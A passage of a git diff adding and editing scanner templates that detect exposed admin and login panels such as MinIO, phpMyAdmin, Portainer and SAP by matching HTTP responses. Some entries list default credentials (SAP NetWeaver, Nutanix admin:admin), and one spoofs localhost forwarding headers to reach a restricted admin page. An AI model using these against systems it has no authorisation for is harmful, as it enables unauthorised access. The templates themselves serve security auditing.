+ reference: https://www.exploit-db.com/ghdb/6500
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/start.html"
+ - "{{BaseURL}}/www/start.html"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Miniweb Start Page '
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/minio-detect.yaml b/exposed-panels/minio-detect.yaml
new file mode 100644
index 0000000000..c7c29a31f4
--- /dev/null
+++ b/exposed-panels/minio-detect.yaml
@@ -0,0 +1,23 @@
+id: minio-detect
+
+info:
+ name: Minio panel detect
+ author: pikpikcu
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/minio/login"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "MinIO Browser "
+ - "Minio Browser "
+ part: body
+ condition: or
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/mobileiron-login.yaml b/exposed-panels/mobileiron-login.yaml
index dcc9389c43..df72731601 100644
--- a/exposed-panels/mobileiron-login.yaml
+++ b/exposed-panels/mobileiron-login.yaml
@@ -2,8 +2,9 @@ id: mobileiron-login
info:
name: MobileIron Login
- author: dhiyaneshDK & @dwisiswant0
- Severity: info
+ author: dhiyaneshDK,dwisiswant0
+ severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/monitorix-exposure.yaml b/exposed-panels/monitorix-exposure.yaml
new file mode 100644
index 0000000000..8c0b91fe08
--- /dev/null
+++ b/exposed-panels/monitorix-exposure.yaml
@@ -0,0 +1,28 @@
+id: monitorix-exposure
+info:
+ name: Monitorix
+ author: geeknik
+ description: Monitorix is a free, open source, lightweight system monitoring tool designed to monitor as many services and system resources as possible.
+ reference: https://www.monitorix.org/
+ severity: low
+ tags: monitorix,exposure,logs,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Global kernel usage "
+ - "Kernel usage per processor"
+ - ""
+ - "1day.png'"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml
new file mode 100644
index 0000000000..0b1a054100
--- /dev/null
+++ b/exposed-panels/nessus-panel.yaml
@@ -0,0 +1,27 @@
+id: nessus-panel-detect
+
+info:
+ name: Nessus Panel detector
+ author: joanbono
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/server/status"
+ headers:
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '{"code":200,"progress":null,"status":"ready"}'
+ part: body
+ - type: word
+ words:
+ - 'NessusWWW'
+ part: header
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/netis-router.yaml b/exposed-panels/netis-router.yaml
new file mode 100644
index 0000000000..73aea5ed1f
--- /dev/null
+++ b/exposed-panels/netis-router.yaml
@@ -0,0 +1,29 @@
+id: netis-router
+
+info:
+ name: Netis Router Login
+ author: gy741
+ severity: info
+ reference: https://www.tacnetsol.com/blog/cve-2019-8985-rce
+ tags: panel,login,netis
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'AP setup '
+
+ - type: word
+ part: header
+ words:
+ - 'Server: netis'
+
+ - type: status
+ status:
+ - 200
diff --git a/technologies/detect-springboot-actuator.yaml b/exposed-panels/netlify-cms.yaml
similarity index 54%
rename from technologies/detect-springboot-actuator.yaml
rename to exposed-panels/netlify-cms.yaml
index 25f0aec8ba..48ae323adf 100644
--- a/technologies/detect-springboot-actuator.yaml
+++ b/exposed-panels/netlify-cms.yaml
@@ -1,20 +1,22 @@
-id: detect-springboot-actuator
+id: netlify-cms
info:
- name: Detect Springboot Actuators
- author: that_juan_ & dwisiswant0 & wdahlenb
+ name: Netlify CMS Admin Panel
+ author: sullo
severity: info
+ tags: panel
requests:
- method: GET
path:
- - "{{BaseURL}}/actuator"
+ - "{{BaseURL}}/admin/index.html"
+
matchers-condition: and
matchers:
- - type: word
- part: body
- words:
- - '{"_links":{"self"'
- type: status
status:
- 200
+ - type: word
+ words:
+ - "Netlify CMS"
+ part: body
diff --git a/exposed-panels/netscalar-aaa-login.yaml b/exposed-panels/netscalar-aaa-login.yaml
new file mode 100644
index 0000000000..1f8c66d7b3
--- /dev/null
+++ b/exposed-panels/netscalar-aaa-login.yaml
@@ -0,0 +1,18 @@
+id: netscalar-aaa-login
+
+info:
+ name: NetScalar AAA Login Panel
+ author: dhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6898
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/logon/LogonPoint/tmindex.html'
+ matchers:
+ - type: word
+ words:
+ - "NetScaler AAA"
+ condition: and
diff --git a/exposed-panels/netscaler-gateway.yaml b/exposed-panels/netscaler-gateway.yaml
index 0f006101d3..bb2d60dff7 100644
--- a/exposed-panels/netscaler-gateway.yaml
+++ b/exposed-panels/netscaler-gateway.yaml
@@ -4,6 +4,7 @@ info:
name: Netscaler gateway
author: joeldeleep
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/nutanix-web-console-login.yaml b/exposed-panels/nutanix-web-console-login.yaml
new file mode 100644
index 0000000000..b4c1dfa884
--- /dev/null
+++ b/exposed-panels/nutanix-web-console-login.yaml
@@ -0,0 +1,22 @@
+id: nutanix-web-console-login
+
+info:
+ name: Nutanix web console login page
+ author: gy741
+ severity: info
+ description: Default Credentials of admin:admin on Nutanix web console.
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/console/'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Nutanix Web Console "
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/octoprint-login.yaml b/exposed-panels/octoprint-login.yaml
new file mode 100644
index 0000000000..c315a55380
--- /dev/null
+++ b/exposed-panels/octoprint-login.yaml
@@ -0,0 +1,23 @@
+id: octoprint-panel
+
+info:
+ name: OctoPrint Login
+ author: affix
+ severity: info
+ tags: octoprint,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ - "{{BaseURL}}/login/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'OctoPrint Login '
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/odoo-database-manager.yaml b/exposed-panels/odoo-database-manager.yaml
new file mode 100644
index 0000000000..3031253bbe
--- /dev/null
+++ b/exposed-panels/odoo-database-manager.yaml
@@ -0,0 +1,23 @@
+id: odoo-database-manager
+
+info:
+ name: Odoo-Database-Manager
+ author: __Fazal,R3dg33k
+ severity: high
+ tags: panel,odoo
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/web/database/manager'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Odoo "
+ - "{ action: 'database_manager' }"
+ condition: and
diff --git a/exposed-panels/oipm-detect.yaml b/exposed-panels/oipm-detect.yaml
index 234cae2dc2..7c944150c5 100644
--- a/exposed-panels/oipm-detect.yaml
+++ b/exposed-panels/oipm-detect.yaml
@@ -3,6 +3,7 @@ info:
name: One Identity Password Manager detection
author: nodauf
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/oki-data.yaml b/exposed-panels/oki-data.yaml
new file mode 100644
index 0000000000..a3173b2a45
--- /dev/null
+++ b/exposed-panels/oki-data.yaml
@@ -0,0 +1,22 @@
+id: oki-data-corporation
+
+info:
+ name: Oki Data Corporation
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/5937
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/status.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Oki Data Corporation'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/open-stack-dashboard-login.yaml b/exposed-panels/open-stack-dashboard-login.yaml
new file mode 100644
index 0000000000..83e2e5fe2c
--- /dev/null
+++ b/exposed-panels/open-stack-dashboard-login.yaml
@@ -0,0 +1,24 @@
+id: open-stack-dashboard-login
+
+info:
+ name: OpenStack Dashboard
+ author: dhiyaneshDK,hackergautam
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6464
+ tags: panel,openstack
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/dashboard/auth/login/'
+ - '{{BaseURL}}/horizon/auth/login/?next=/horizon/'
+
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Login - OpenStack Dashboard "
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/openerp-database.yaml b/exposed-panels/openerp-database.yaml
new file mode 100644
index 0000000000..7d9f2c6a84
--- /dev/null
+++ b/exposed-panels/openerp-database.yaml
@@ -0,0 +1,22 @@
+id: openerp-database
+
+info:
+ name: OpenERP database instances
+ author: impramodsargar
+ severity: info
+ tags: openerp,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/web/database/selector/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Odoo '
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/opennms-web-console.yaml b/exposed-panels/opennms-web-console.yaml
new file mode 100644
index 0000000000..7aa544420b
--- /dev/null
+++ b/exposed-panels/opennms-web-console.yaml
@@ -0,0 +1,24 @@
+id: opennms-web-console
+
+info:
+ name: OpenNMS web console
+ author: DhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/5468
+ tags: panel,login
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/opennms/login.jsp"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "OpenNMS Web Console"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/pagespeed-global-admin.yaml b/exposed-panels/pagespeed-global-admin.yaml
new file mode 100644
index 0000000000..bf020c0244
--- /dev/null
+++ b/exposed-panels/pagespeed-global-admin.yaml
@@ -0,0 +1,33 @@
+id: pagespeed-global-admin
+
+info:
+ name: Pagespeed Global Admin
+ reference: https://www.modpagespeed.com/
+ author: geeknik
+ severity: low
+ tags: pagespeed
+
+requests:
+ - method: GET
+ headers:
+ X-Client-IP: "127.0.0.1"
+ X-Remote-IP: "127.0.0.1"
+ X-Remote-Addr: "127.0.0.1"
+ X-Forwarded-For: "127.0.0.1"
+ X-Originating-IP: "127.0.0.1"
+ X-Host: "127.0.0.1"
+ X-Forwarded-Host: "127.0.0.1"
+
+ path:
+ - "{{BaseURL}}/pagespeed-global-admin/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "X-Mod-Pagespeed"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/pandora-fms-console.yaml b/exposed-panels/pandora-fms-console.yaml
new file mode 100644
index 0000000000..5224d23ff1
--- /dev/null
+++ b/exposed-panels/pandora-fms-console.yaml
@@ -0,0 +1,22 @@
+id: pandora-fms-console
+
+info:
+ name: Pandora FMS
+ author: dhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6827
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pandora_console/mobile/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Pandora FMS mobile '
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/parallels-html-client.yaml b/exposed-panels/parallels-html-client.yaml
index 4602cc5ce4..d55db4e436 100644
--- a/exposed-panels/parallels-html-client.yaml
+++ b/exposed-panels/parallels-html-client.yaml
@@ -2,8 +2,9 @@ id: parallels-html-client
info:
name: Parallels HTML5 Client
- author: pd-team
+ author: pdteam
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/pgadmin-exposure.yaml b/exposed-panels/pgadmin-exposure.yaml
new file mode 100644
index 0000000000..b9b6e07c37
--- /dev/null
+++ b/exposed-panels/pgadmin-exposure.yaml
@@ -0,0 +1,26 @@
+id: pgadmin-exposure
+info:
+ name: PostgreSQL - pgAdmin Dasboard Exposure
+ author: princechaddha
+ severity: info
+ tags: unauth,pgadmin,postgres,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/browser/"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "PGADMIN_LANGUAGE="
+ part: header
+
+ - type: word
+ words:
+ - "pgAdmin"
+ part: body
diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml
index f8ce001dc1..70390d3b8f 100644
--- a/exposed-panels/phpmyadmin-panel.yaml
+++ b/exposed-panels/phpmyadmin-panel.yaml
@@ -2,8 +2,9 @@ id: phpmyadmin-panel
info:
name: phpMyAdmin Panel
- author: pd-team
+ author: pdteam
severity: info
+ tags: panel
requests:
- method: GET
@@ -23,3 +24,10 @@ requests:
- type: word
words:
- "phpMyAdmin "
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'v=([a-z0-9-._]+)'
\ No newline at end of file
diff --git a/exposed-panels/phppgadmin-panel.yaml b/exposed-panels/phppgadmin-panel.yaml
new file mode 100644
index 0000000000..88f6f22f94
--- /dev/null
+++ b/exposed-panels/phppgadmin-panel.yaml
@@ -0,0 +1,19 @@
+id: phppgadmin-panel
+
+info:
+ name: phpPgAdmin Panel
+ author: Ganofins
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/phppgadmin/"
+ matchers:
+ - type: word
+ words:
+ - "phpPgAdmin"
+ - "browser.php"
+ - "intro.php"
+ condition: and
diff --git a/exposed-panels/plastic-scm-login.yaml b/exposed-panels/plastic-scm-login.yaml
new file mode 100644
index 0000000000..9efc84cc89
--- /dev/null
+++ b/exposed-panels/plastic-scm-login.yaml
@@ -0,0 +1,22 @@
+id: plastic-scm-login
+
+info:
+ name: Plastic SCM Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Log+in+-+Plastic+SCM%22
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/account'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Log in - Plastic SCM '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/plesk-obsidian.yaml b/exposed-panels/plesk-obsidian.yaml
new file mode 100644
index 0000000000..fb8676e807
--- /dev/null
+++ b/exposed-panels/plesk-obsidian.yaml
@@ -0,0 +1,23 @@
+id: plesk-obsidian
+
+info:
+ name: Plesk Obsidian
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6951
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login_up.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Plesk Obsidian'
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/plesk-onyx.yaml b/exposed-panels/plesk-onyx.yaml
new file mode 100644
index 0000000000..677e4bcfd3
--- /dev/null
+++ b/exposed-panels/plesk-onyx.yaml
@@ -0,0 +1,23 @@
+id: plesk-onyx-login
+
+info:
+ name: Plesk Onyx login portal
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6501
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login_up.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Plesk Onyx'
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/polycom-admin-detect.yaml b/exposed-panels/polycom-admin-detect.yaml
index daae85917a..3b29cc8b7c 100644
--- a/exposed-panels/polycom-admin-detect.yaml
+++ b/exposed-panels/polycom-admin-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Polycom Admin Panel
author: e_schultze_
severity: low
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/polycom-login.yaml b/exposed-panels/polycom-login.yaml
new file mode 100644
index 0000000000..279b09714f
--- /dev/null
+++ b/exposed-panels/polycom-login.yaml
@@ -0,0 +1,24 @@
+id: polycom-login
+
+info:
+ name: Polycom Login
+ author: DhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6863
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login.html"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Polycom Login "
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/portainer-init-deploy.yaml b/exposed-panels/portainer-init-deploy.yaml
new file mode 100644
index 0000000000..c25c658536
--- /dev/null
+++ b/exposed-panels/portainer-init-deploy.yaml
@@ -0,0 +1,26 @@
+id: portainer-init-deploy
+info:
+ name: Portainer Init Deploy
+ author: princechaddha
+ severity: high
+ tags: portainer,exposure,docker,devops,panel
+ reference: https://documentation.portainer.io/v2.0/deploy/initial/
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/users/admin/check"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "No administrator account found inside the database"
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: status
+ status:
+ - 404
diff --git a/exposed-panels/powerlogic-ion.yaml b/exposed-panels/powerlogic-ion.yaml
new file mode 100644
index 0000000000..4f5ae8d7fd
--- /dev/null
+++ b/exposed-panels/powerlogic-ion.yaml
@@ -0,0 +1,22 @@
+id: powerlogic-ion
+
+info:
+ name: PowerLogic ION Exposed
+ author: dhiyaneshDK
+ severity: low
+ reference: https://www.exploit-db.com/ghdb/6810
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'PowerLogic ION'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/prometheus-exporter-detect.yaml b/exposed-panels/prometheus-exporter-detect.yaml
index 62746091f9..b77807a555 100644
--- a/exposed-panels/prometheus-exporter-detect.yaml
+++ b/exposed-panels/prometheus-exporter-detect.yaml
@@ -4,8 +4,8 @@ info:
author: jarijaas
severity: info
description: Prometheus exporter detector
-
-# See https://github.com/prometheus/prometheus/wiki/Default-port-allocations
+ tags: panel
+ reference: https://github.com/prometheus/prometheus/wiki/Default-port-allocations
requests:
- method: GET
diff --git a/exposed-panels/public-tomcat-manager.yaml b/exposed-panels/public-tomcat-manager.yaml
index 1a2401b47a..67f8d2ab1b 100644
--- a/exposed-panels/public-tomcat-manager.yaml
+++ b/exposed-panels/public-tomcat-manager.yaml
@@ -2,8 +2,9 @@ id: public-tomcat-manager
info:
name: tomcat manager disclosure
- author: Ahmed Sherif & geeknik
+ author: Ahmed Sherif,geeknik
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/pulse-secure-panel.yaml b/exposed-panels/pulse-secure-panel.yaml
index 48110dddb5..04b74a4464 100644
--- a/exposed-panels/pulse-secure-panel.yaml
+++ b/exposed-panels/pulse-secure-panel.yaml
@@ -4,6 +4,7 @@ info:
name: Pulse Secure VPN Panel
author: bsysop
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/rabbitmq-dashboard.yaml b/exposed-panels/rabbitmq-dashboard.yaml
index b9add7a446..9a1abcdfe3 100644
--- a/exposed-panels/rabbitmq-dashboard.yaml
+++ b/exposed-panels/rabbitmq-dashboard.yaml
@@ -4,6 +4,7 @@ info:
name: RabbitMQ Dashboard
author: fyoorer
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/radius-manager.yaml b/exposed-panels/radius-manager.yaml
new file mode 100644
index 0000000000..2dc11c7ade
--- /dev/null
+++ b/exposed-panels/radius-manager.yaml
@@ -0,0 +1,25 @@
+id: radius-manager-login
+
+info:
+ name: Radius Manager Control Panel
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6790
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/admin.php'
+ - '{{BaseURL}}/radiusmanager/user.php'
+ - '{{BaseURL}}/user.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Radius Manager - User Control Panel '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/remote-ui-login.yaml b/exposed-panels/remote-ui-login.yaml
new file mode 100644
index 0000000000..aeeeb8998a
--- /dev/null
+++ b/exposed-panels/remote-ui-login.yaml
@@ -0,0 +1,22 @@
+id: remote-ui-login
+
+info:
+ name: Remote UI Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6815
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'System Manager ID: '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/rocketmq-console-exposure.yaml b/exposed-panels/rocketmq-console-exposure.yaml
index 896022430f..9a86dc6984 100644
--- a/exposed-panels/rocketmq-console-exposure.yaml
+++ b/exposed-panels/rocketmq-console-exposure.yaml
@@ -2,8 +2,9 @@ id: rocketmq-console-exposure
info:
name: Apache RocketMQ Console Exposure
- author: pd-team
- severity: medium
+ author: pdteam
+ severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/rsa-self-service.yaml b/exposed-panels/rsa-self-service.yaml
index 8743fad505..aa6a36e208 100644
--- a/exposed-panels/rsa-self-service.yaml
+++ b/exposed-panels/rsa-self-service.yaml
@@ -4,6 +4,7 @@ info:
name: Detect RSA Self-Service Panel
author: PR3R00T
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/rstudio-detect.yaml b/exposed-panels/rstudio-detect.yaml
new file mode 100644
index 0000000000..d5e3bef4f2
--- /dev/null
+++ b/exposed-panels/rstudio-detect.yaml
@@ -0,0 +1,21 @@
+id: rstudio-detect
+
+info:
+ name: RStudio panel detector
+ author: philippedelteil
+ severity: info
+ tags: panel,rstudio
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'RStudio'
+ part: header
+ - type: status
+ status:
+ - 302
diff --git a/exposed-panels/saferoads-vms-login.yaml b/exposed-panels/saferoads-vms-login.yaml
new file mode 100644
index 0000000000..7fd9a2d174
--- /dev/null
+++ b/exposed-panels/saferoads-vms-login.yaml
@@ -0,0 +1,17 @@
+id: saferoads-vms-login
+
+info:
+ name: Saferoads VMS Login
+ author: dhiyaneshDk
+ severity: info
+ tags: panel
+ reference: https://www.exploit-db.com/ghdb/6941
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.html'
+ matchers:
+ - type: word
+ words:
+ - 'Saferoads VMS'
\ No newline at end of file
diff --git a/exposed-panels/sap-hana-xsengine-panel.yaml b/exposed-panels/sap-hana-xsengine-panel.yaml
index d61062ac70..2b6556f77d 100644
--- a/exposed-panels/sap-hana-xsengine-panel.yaml
+++ b/exposed-panels/sap-hana-xsengine-panel.yaml
@@ -4,6 +4,7 @@ info:
name: SAP HANA XSEngine Admin Panel
author: PR3R00T
severity: info
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/sap-netweaver-detect.yaml b/exposed-panels/sap-netweaver-portal.yaml
similarity index 81%
rename from exposed-panels/sap-netweaver-detect.yaml
rename to exposed-panels/sap-netweaver-portal.yaml
index 071739d7b5..a2cecfe535 100644
--- a/exposed-panels/sap-netweaver-detect.yaml
+++ b/exposed-panels/sap-netweaver-portal.yaml
@@ -1,9 +1,10 @@
-id: sap-netweaver-portal-detect
+id: sap-netweaver-portal
info:
- name: SAP NetWeaver Portal detect
+ name: SAP NetWeaver Portal
author: organiccrap
severity: info
+ tags: panel,sap
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
diff --git a/exposed-panels/sap-recon-detect.yaml b/exposed-panels/sap-recon-detect.yaml
deleted file mode 100644
index 813cc8314a..0000000000
--- a/exposed-panels/sap-recon-detect.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: sap-recon-detect
-
-info:
- name: SAP RECON Finder
- author: samueladi_ & organiccrap
- severity: medium
-
- # Source:- https://github.com/chipik/SAP_RECON
- # This is detection template, please use above poc to exploit this further.
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
- - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
- - "{{BaseURL}}/CTCWebService/Config1?wsdl"
-
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - Method Not Allowed
- - Expected request method POST. Found GET.
- - Generated by WSDLDefinitionsParser
- - bns0:Config1Binding
- - wsdl:definitions
- - tns:CTCWebServiceSiBinding
- condition: or
-
- - type: status
- status:
- - 405
- - 200
- condition: or
diff --git a/exposed-panels/sapfiori-panel.yaml b/exposed-panels/sapfiori-panel.yaml
new file mode 100644
index 0000000000..bb5e0cd842
--- /dev/null
+++ b/exposed-panels/sapfiori-panel.yaml
@@ -0,0 +1,30 @@
+id: sapfiori-panel
+
+info:
+ name: SAP Fiori Instance Detection Template
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a SAP Fiori instance via the login page
+ tags: panel,sap,fiori
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/fiori"
+ - "{{BaseURL}}/irj/portal/fiori"
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - 'fioriLogin'
+ - 'action="/fiori"'
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "UIPPortalPath"
+ - "/irj/portal/fiori"
+ part: body
+ condition: and
\ No newline at end of file
diff --git a/exposed-panels/sauter-login.yaml b/exposed-panels/sauter-login.yaml
new file mode 100644
index 0000000000..b98741cab1
--- /dev/null
+++ b/exposed-panels/sauter-login.yaml
@@ -0,0 +1,24 @@
+id: sauter-login
+
+info:
+ name: Sauter moduWeb - Login
+ author: DhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6883
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?locale=en"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - Sauter moduWeb - Login
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/seats-login.yaml b/exposed-panels/seats-login.yaml
new file mode 100644
index 0000000000..1c92b2e947
--- /dev/null
+++ b/exposed-panels/seats-login.yaml
@@ -0,0 +1,22 @@
+id: seats-login
+
+info:
+ name: Seats login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "seats.io | login "
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/securenvoy-panel.yaml b/exposed-panels/securenvoy-panel.yaml
new file mode 100644
index 0000000000..116bb9e931
--- /dev/null
+++ b/exposed-panels/securenvoy-panel.yaml
@@ -0,0 +1,23 @@
+id: securenvoy-panel
+
+info:
+ name: SecurEnvoy Admin Login
+ author: 0xrod
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/secadmin/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ' '
+ part: body
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/exposed-panels/selenoid-ui-exposure.yaml b/exposed-panels/selenoid-ui-exposure.yaml
index 69752f1412..3185acf898 100644
--- a/exposed-panels/selenoid-ui-exposure.yaml
+++ b/exposed-panels/selenoid-ui-exposure.yaml
@@ -2,8 +2,9 @@ id: selenoid-ui-exposure
info:
name: Selenoid UI Dashboard Exposure
- author: pd-team
+ author: pdteam
severity: medium
+ tags: panel
requests:
- method: GET
diff --git a/exposed-panels/server-backup-login.yaml b/exposed-panels/server-backup-login.yaml
new file mode 100644
index 0000000000..13d8c06c60
--- /dev/null
+++ b/exposed-panels/server-backup-login.yaml
@@ -0,0 +1,22 @@
+id: server-backup-login
+
+info:
+ name: Server Backup Manager SE Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6949
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.zul'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Idera Server Backup Manager SE '
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/servicedesk-login-panel.yaml b/exposed-panels/servicedesk-login-panel.yaml
new file mode 100644
index 0000000000..bb50d7d5af
--- /dev/null
+++ b/exposed-panels/servicedesk-login-panel.yaml
@@ -0,0 +1,24 @@
+id: servicedesk-login-panel
+
+info:
+ name: Servicedesk Login Panel Detector
+ author: aashiq
+ severity: info
+ description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint
+ tags: servicedesk,confluence,jira,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/servicedesk/customer/user/login"
+ - "{{BaseURL}}/servicedesk/customer/portal/10/user/login"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "https://confluence.atlassian.com"
